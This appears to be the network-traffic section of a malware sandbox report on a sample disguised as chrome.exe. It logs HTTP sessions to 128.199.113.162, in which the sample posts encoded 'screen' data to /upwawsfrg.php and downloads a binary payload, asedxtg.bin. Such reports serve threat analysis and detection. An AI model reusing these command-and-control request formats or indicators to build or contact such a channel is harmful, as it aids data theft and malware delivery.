Jul 11, 2023 15:47:15.782804966 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:15.797589064 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:15.991235018 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:15.991264105 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:15.991277933 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:15.991292000 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:15.991466999 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:16.185045004 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185070038 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185086966 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185101032 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185113907 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185169935 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185184956 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185230017 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.185245037 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.186331034 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.198899031 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:16.198977947 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:16.392694950 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392721891 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392736912 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392751932 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392797947 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392813921 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392827988 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392843008 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392857075 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392911911 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392971992 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392986059 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.392999887 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.393014908 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.393030882 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.393045902 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.393913031 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:16.587497950 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.587522984 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.587537050 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.587546110 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.587832928 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.587852955 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.588099003 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.588114023 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.588187933 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.588202953 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.588216066 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.588228941 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.816745043 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:16.859309912 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:16.962865114 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:17.156748056 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370687008 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370728970 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370748997 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370767117 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370786905 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370805025 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370822906 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370841980 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370857954 CEST | 80 | 49690 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:17.370940924 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:17.370979071 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:17.827130079 CEST | 49690 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:17.857606888 CEST | 49691 | 443 | 192.168.2.4 | 104.248.194.233
Jul 11, 2023 15:47:17.857702017 CEST | 443 | 49691 | 104.248.194.233 | 192.168.2.4
Jul 11, 2023 15:47:17.857875109 CEST | 49691 | 443 | 192.168.2.4 | 104.248.194.233
Jul 11, 2023 15:47:19.009354115 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.000415087 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.171595097 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.171940088 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.173682928 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.344811916 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.345010042 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.348160982 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.519382000 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.519423008 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.519557953 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.519619942 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.690651894 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.690681934 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.690696001 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.690711021 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.690756083 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.690809011 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.690809011 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.861804962 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861844063 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861865997 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861886024 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861896038 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.861905098 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861922979 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861943960 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861970901 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.861996889 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.862067938 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:22.903727055 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:22.903913021 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:23.033344984 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033381939 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033400059 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033421040 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033438921 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033457041 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033476114 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033493042 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033510923 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033529043 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.033576965 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:23.033658981 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:23.075061083 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.204967976 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205038071 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205064058 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205084085 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205106974 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205125093 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205142975 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205161095 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205180883 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205198050 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205216885 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205236912 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205581903 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205602884 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205616951 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205631018 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205645084 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205658913 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205672026 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205686092 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205698967 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205712080 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205724955 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.205738068 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.434360981 CEST | 80 | 49692 | 128.199.113.162 | 192.168.2.4
Jul 11, 2023 15:47:23.484831095 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
Jul 11, 2023 15:47:23.579682112 CEST | 49692 | 80 | 192.168.2.4 | 128.199.113.162
                • 128.199.113.162
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49690 | 128.199.113.162 | 80 | C:\Users\user\Desktop\chrome.exe
                TimestampkBytes transferredDirectionData
                Jul 11, 2023 15:47:15.589050055 CEST0OUTPOST /upwawsfrg.php HTTP/1.1
                Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
                Host: 128.199.113.162
                Content-Length: 126665
                Expect: 100-continue
                Connection: Keep-Alive
                Jul 11, 2023 15:47:15.782804966 CEST0INHTTP/1.1 100 Continue
                Jul 11, 2023 15:47:15.797589064 CEST13OUTData Raw: 4e 61 6d 65 3d 73 63 72 65 65 6e 26 64 61 74 61 46 69 6c 65 3d 46 38 25 32 66 64 25 32 66 48 35 4a 58 65 5a 4d 41 6b 4c 30 74 30 32 5a 50 39 6e 56 73 7a 31 59 65 48 34 71 44 52 38 32 54 74 52 6b 63 50 53 33 41 31 37 69 25 32 62 44 25 32 62 65 57
                Data Ascii: Name=screen&dataFile=F8%2fd%2fH5JXeZMAkL0t02ZP9nVsz1YeH4qDR82TtRkcPS3A17i%2bD%2beW8jcCw6IhZeNxNXbLBuckFSTLXcT0TBTELYT249rzoZccVvKn3BKa84Bl0yNZZKK%2fQgIEGLedQypBDeGREnjjvcQbVDqHwI0PUvDqIl6p9YxSYhAW8GjzftgCWUCtaPMqPnB1KZrrLkLdbaUyC94jbjy0dh1ascf
                Jul 11, 2023 15:47:15.991466999 CEST | 38 | OUT | Data Raw: 49 49 6c 31 46 63 55 48 6c 6e 44 57 57 77 4f 68 75 25 32 66 4b 63 61 4b 57 50 77 4b 33 52 47 52 78 55 78 72 6b 69 61 71 71 35 79 30 58 6b 54 44 4f 4b 4e 46 4a 71 51 65 67 4e 39 49 36 57 33 54 56 31 5a 41 36 5a 4a 4b 57 46 73 77 63 54 4c 64 62 76
                Data Ascii: IIl1FcUHlnDWWwOhu%2fKcaKWPwK3RGRxUxrkiaqq5y0XkTDOKNFJqQegN9I6W3TV1ZA6ZJKWFswcTLdbvfJR8IOrJeuez%2bPhD%2f803YP5s0zVtDIg3fFK3sVLo8yFOlzDDNB80YZAqRn2mo2N3WHGxKPg%2f7Kah6Sy20X9%2bgMJ6b%2f%2f2yjyKZs6sOVu9kfHPf2kmyoT4HeQo4U06l1GBO7HaIneJBbmTeFjqnv8IQ
                Jul 11, 2023 15:47:16.198899031 CEST | 79 | OUT | Data Raw: 67 33 58 44 77 66 4c 74 68 75 4a 31 6b 4a 70 66 6b 31 67 30 52 70 44 6f 30 35 35 59 7a 73 59 67 55 69 25 32 66 4e 6b 7a 54 32 43 65 46 78 64 37 6e 66 61 32 32 33 64 78 7a 48 72 41 49 37 46 52 74 6a 25 32 66 4e 6d 74 32 61 61 49 45 75 6e 54 46 43
                Data Ascii: g3XDwfLthuJ1kJpfk1g0RpDo055YzsYgUi%2fNkzT2CeFxd7nfa223dxzHrAI7FRtj%2fNmt2aaIEunTFCIosGBg%2bBbUEUQgZ3NtRv38%2bh7KHx%2bPUORgUqS%2fPmOYy8AGeWl%2bhc8expVpMOgxMk%2bgzZDd4HchrZ43wYKHbhDUoBZtHJM8FO3r%2fdL93FN5JyD9wA2V%2fgKcQlhkq2vRXo2wD8yM7lvTI3UvV%2
                Jul 11, 2023 15:47:16.198977947 CEST | 89 | OUT | Data Raw: 74 4c 31 79 79 42 4a 63 6d 50 57 6a 68 71 58 4f 52 79 65 50 43 49 31 41 78 67 59 74 74 35 69 61 78 4c 76 6c 68 72 68 66 33 6a 64 52 45 43 55 43 43 37 70 62 73 4d 50 35 6d 6e 51 31 4e 72 6b 51 34 44 4f 31 44 79 54 50 71 6e 4d 72 72 41 51 58 55 65
                Data Ascii: tL1yyBJcmPWjhqXORyePCI1AxgYtt5iaxLvlhrhf3jdRECUCC7pbsMP5mnQ1NrkQ4DO1DyTPqnMrrAQXUe6vD%2bBnySEitCJ7%2fGU5hu3jLvDjxflJ3CXaZXA9PdBFvFgmRxcWv5enPe2FTvvbqIBTlQArFqxQMtjZIq9bsSbZZ%2fxoubb%2frpwzNdu9JvJdRNeGn0uwOTsbzDgK1llTSx%2fT3I3AQfVwc3kY5HdW461or
                Jul 11, 2023 15:47:16.393913031 CEST | 126 | OUT | Data Raw: 35 32 66 55 6b 25 32 62 62 4d 34 4f 45 76 6b 61 35 65 4d 34 61 6d 35 7a 64 52 52 5a 4f 78 6d 56 53 70 68 63 31 47 55 75 7a 50 50 4c 6d 69 63 45 4a 44 65 71 55 62 66 30 32 72 61 52 31 4e 73 6b 65 56 35 49 32 49 69 67 47 79 50 42 34 32 25 32 66 55
                Data Ascii: 52fUk%2bbM4OEvka5eM4am5zdRRZOxmVSphc1GUuzPPLmicEJDeqUbf02raR1NskeV5I2IigGyPB42%2fUiy6a6y0wunOCEewIIUb8v%2bnfiqyhViY%2bJ40%2f1hijf2kK87hiwzwhoIlirjNBm%2bO0AjKrwZWdS2zhz9xPQXRy%2blfxa2aJJFxBjsoyyOfakSGsIqQvREVVY0Vptk6lJNg5E4mYIGmwvBzz4LtRNES%2fY
                Jul 11, 2023 15:47:16.816745043 CEST | 127 | IN | HTTP/1.1 200 OK
                Date: Tue, 11 Jul 2023 13:47:15 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Length: 4
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 38 3d 3d 33
                Data Ascii: 8==3
                Jul 11, 2023 15:47:16.962865114 CEST | 127 | OUT | GET /upwawsfrg.php?zd=1 HTTP/1.1
                Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
                User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
                Host: 128.199.113.162
                Jul 11, 2023 15:47:17.370687008 CEST | 127 | IN | HTTP/1.1 200 OK
                Date: Tue, 11 Jul 2023 13:47:17 GMT
                Server: Apache/2.4.41 (Ubuntu)
                Content-Description: File Transfer
                Content-Disposition: attachment; filename=asedxtg.bin
                Content-Transfer-Encoding: binary
                Expires: 0
                Cache-Control: must-revalidate, post-check=0, pre-check=0
                Pragma: public
                Content-Length: 9560
                Content-Type: application/octet-stream
                Jul 11, 2023 15:47:17.370728970 CEST | 129 | IN | Data Raw: 70 55 32 79 48 48 31 5a 46 36 41 42 52 45 4c 31 53 62 4f 5a 58 32 47 31 73 7a 32 6e 6f 33 35 70 54 52 63 77 53 4e 4e 69 64 66 79 77 42 46 6e 72 38 54 65 55 56 39 7a 52 42 77 57 44 69 59 36 66 31 39 72 50 4d 51 47 44 6a 6b 6d 4a 4d 57 73 7a 50 52
                Data Ascii: pU2yHH1ZF6ABREL1SbOZX2G1sz2no35pTRcwSNNidfywBFnr8TeUV9zRBwWDiY6f19rPMQGDjkmJMWszPR50MJogQp13Uri4fNP654lfIIFR2VTPK9Peu1ua6wH8GmvPeRvvLXGc9oECJSLraX9VLxSe/t5mmOkJX7pyafOR/8lrH0bt+tSBFLa2mRok2/S3HQeidGMPwAS9ppTJJ7CfC+R1WQ0fOiu2FJHPm6o0sEcv2xnv12b
                Jul 11, 2023 15:47:17.370748997 CEST | 130 | IN | Data Raw: 2b 42 46 35 79 4f 77 76 57 72 58 31 42 33 42 4a 43 6c 39 6a 77 61 72 71 4c 6d 55 4a 69 68 69 70 62 36 33 4e 37 4a 50 31 49 4a 42 48 49 51 78 65 53 6a 42 4d 38 42 75 44 63 45 78 33 41 50 71 53 6d 71 65 48 65 54 33 66 63 63 64 42 33 70 36 4b 36 70
                Data Ascii: +BF5yOwvWrX1B3BJCl9jwarqLmUJihipb63N7JP1IJBHIQxeSjBM8BuDcEx3APqSmqeHeT3fccdB3p6K6pvDP/fzRjtDn5ufYm7Rt7RHRDeSnugRjZaweZtgBWJeZc4QTUgY8dR2BOqRRB/BLjZe52vfCkoDVQNxUnH/AUxonG2SCHP7jTmoOyPeFsi8sfX6zuDgoh1Ww8rCEfmJKAbzGnqhZElp0v2hxrGKWb/qdHX/t/7d1cJ
                Jul 11, 2023 15:47:17.370767117 CEST | 131 | IN | Data Raw: 6b 42 5a 78 68 68 72 34 6c 4e 44 50 78 34 72 45 37 2f 65 49 52 38 2b 6d 35 33 43 57 39 7a 6b 7a 75 49 4e 59 76 4d 31 48 5a 58 48 4e 50 71 73 7a 6e 69 39 55 48 58 7a 5a 56 54 70 67 6b 77 39 35 64 2f 4f 67 49 68 6e 56 4e 78 43 61 59 30 70 64 43 4b
                Data Ascii: kBZxhhr4lNDPx4rE7/eIR8+m53CW9zkzuINYvM1HZXHNPqszni9UHXzZVTpgkw95d/OgIhnVNxCaY0pdCKKfr385jttaiyeBQzwMMy+saMLlFK1YeUopRqXWYPUrx/CrKejsthgdzoFmeSbNLHBcEnkayToSDbyq19qAU5gcssCVPzPCDobE8/au2varo9ycHok4/O+A5Qezsu7d3KqYrZ/8d156IVsEEEM72MX1y2w9c71rABv
                Jul 11, 2023 15:47:17.370786905 CEST | 133 | IN | Data Raw: 78 35 54 52 58 4e 35 4e 68 52 65 4e 64 71 45 69 32 7a 59 52 66 46 6c 42 34 43 35 4d 75 4e 6d 56 35 41 38 4d 70 62 4b 68 37 76 56 5a 46 77 4f 4c 49 55 7a 6b 32 78 6d 30 4b 6f 56 73 52 35 6f 45 34 51 57 6a 41 74 37 46 74 64 38 6b 65 32 71 44 77 63
                Data Ascii: x5TRXN5NhReNdqEi2zYRfFlB4C5MuNmV5A8MpbKh7vVZFwOLIUzk2xm0KoVsR5oE4QWjAt7Ftd8ke2qDwcpnphFmYtXulCCQWTxHEDA123BTpwotDn8ULXON7T4jQDqSNFOkEu4+KwyDkVNE/0SGAkmJuR+gSGBGCF6fv9luPR8bpYQ1ZD4jzOMWUZuZWAKDN1GGvKGUEmpcqaeaRyd+PJGsYT2m9oSa77+x/N884a0OknjUv9K
                Jul 11, 2023 15:47:17.370805025 CEST | 134 | IN | Data Raw: 32 6b 51 4d 66 51 68 4f 67 7a 49 67 54 57 6c 45 6f 35 71 47 55 65 56 58 70 58 66 5a 7a 73 52 48 54 74 58 62 4f 69 41 46 35 63 63 30 68 47 69 67 55 52 55 75 33 65 65 59 52 58 54 34 54 5a 46 6a 37 59 41 44 63 39 6a 4a 71 65 78 6f 44 35 7a 44 39 6f
                Data Ascii: 2kQMfQhOgzIgTWlEo5qGUeVXpXfZzsRHTtXbOiAF5cc0hGigURUu3eeYRXT4TZFj7YADc9jJqexoD5zD9osHhWOgQtrHfBmm8hln/P34VdKPIZRPxgEAe5lVaB7v+x+A+8gjhnPp3cyjiy3iIIaQ40DUUr6IllBaX0sfS5hMjsj7R+f3nJ5NzwLbxxqMQAeusG3qw9nx4giVC9bBwz87B6ILhOxthX0PzwAeGehLch6HBQSTqYT
                Jul 11, 2023 15:47:17.370822906 CEST | 135 | IN | Data Raw: 73 55 6f 50 5a 62 64 64 39 6e 39 33 78 38 44 74 59 58 4b 54 32 6f 4b 47 68 67 68 36 77 2b 55 58 66 68 6a 45 6f 6b 38 2b 4c 6e 77 31 79 71 53 69 6a 74 33 66 41 4d 4b 52 46 7a 6f 7a 4e 62 38 6a 6c 38 35 32 4b 53 67 4b 30 49 63 33 69 75 39 36 77 4e
                Data Ascii: sUoPZbdd9n93x8DtYXKT2oKGhgh6w+UXfhjEok8+Lnw1yqSijt3fAMKRFzozNb8jl852KSgK0Ic3iu96wNiIM1MWcoTzfhcDeY/4tnUc8w7Fjz5haxD2RR8RrQ41CYvbtGiP+wBPfyVR4MlpthhdCZuv0Fk0bhse4KRloTFuRmCfq5J2FxuoQNwMwtuvgQFXKzJi1F4jAz4YuficZKu1trHFtZytfoKHx07qNf/AZaAsNG8K2NX
                Jul 11, 2023 15:47:17.370841980 CEST | 137 | IN | Data Raw: 6b 6a 43 79 45 4f 49 62 39 66 67 69 48 52 4e 52 56 66 4c 43 39 32 4c 5a 56 38 4a 59 34 48 57 6e 30 31 72 56 6b 69 47 37 4d 56 52 7a 62 2b 6b 67 65 7a 6c 72 33 78 67 2f 62 67 57 2b 74 65 36 4f 45 51 42 75 75 62 79 6a 68 6b 43 71 7a 57 4b 59 50 4b
                Data Ascii: kjCyEOIb9fgiHRNRVfLC92LZV8JY4HWn01rVkiG7MVRzb+kgezlr3xg/bgW+te6OEQBuubyjhkCqzWKYPKjZ66A7y38kaKHEyyRG2jMVThe/ujIUAzvibmaKelRzMY7Rtpba5kdnnRnOtTov9+/ItWWlWXJqvX/LmHz6ZYniua24NyEVVBPP28XQL8eJQClPNMjXfODYAFZ9qm/d1UpAvDNssMIj8gE4iHxlcAEbe1A1ONOGEpK
                Jul 11, 2023 15:47:17.370857954 CEST | 137 | IN | Data Raw: 6d 47 4f 2b 78 35 72 30 78 55 59 7a 38 4f 6d 43 4b 35 51 46 6d 36 74 2f 73 75 64 73 45 79 69 6d 38 62 4e 65 43 68 62 35 55 34 6e 2f 37 51 69 48 62 56 36 6e 77 49 46 6f 51 4c 4d 54 70 30 52 57 31 64 50 79 75 59 31 63 70 42 49 45 79 79 4a 4b 37 56
                Data Ascii: mGO+x5r0xUYz8OmCK5QFm6t/sudsEyim8bNeChb5U4n/7QiHbV6nwIFoQLMTp0RW1dPyuY1cpBIEyyJK7VT9DbV9pMJXm4+fQMqi5aVwDBuU3skYTw235qoqyenvGy3CBZ94Fw5ncq1nMbKFF9zd0ApJWO7LY82ljyAezG6vxJEgFdVw+sxTcbqwxzIM+yqqP3bsNGu4xYcPdlsEThLD3zGJMktAB/j5dPuolNJQw4XN/+Tk/zd


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.4 | 49692 | 128.199.113.162 | 80 | C:\Users\user\Desktop\chrome.exe
                Timestamp | kBytes transferred | Direction | Data
                Jul 11, 2023 15:47:22.173682928 CEST | 138 | OUT | POST /upwawsfrg.php HTTP/1.1
                Cookie: SESSION=sk0BQxQ2ecV2G3vGgHWpaob42l7VzA0Ga2MQH7oMEZPHd3mlpReiee7/PjezuaCviICVEg==
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv: 108.0) Gecko / 20100101 Firefox / 108.0
                Host: 128.199.113.162
                Content-Length: 119627
                Expect: 100-continue
                Connection: Keep-Alive
                Jul 11, 2023 15:47:22.345010042 CEST | 138 | IN | HTTP/1.1 100 Continue
                Jul 11, 2023 15:47:22.348160982 CEST | 143 | OUT | Data Raw: 4e 61 6d 65 3d 73 63 72 65 65 6e 26 64 61 74 61 46 69 6c 65 3d 46 38 25 32 66 64 25 32 66 48 35 4a 58 65 5a 4d 41 6b 4c 30 74 30 32 5a 50 39 6e 56 73 7a 31 59 65 48 34 71 44 52 38 32 54 74 52 6b 63 50 53 33 41 31 37 69 25 32 62 44 25 32 62 65 57
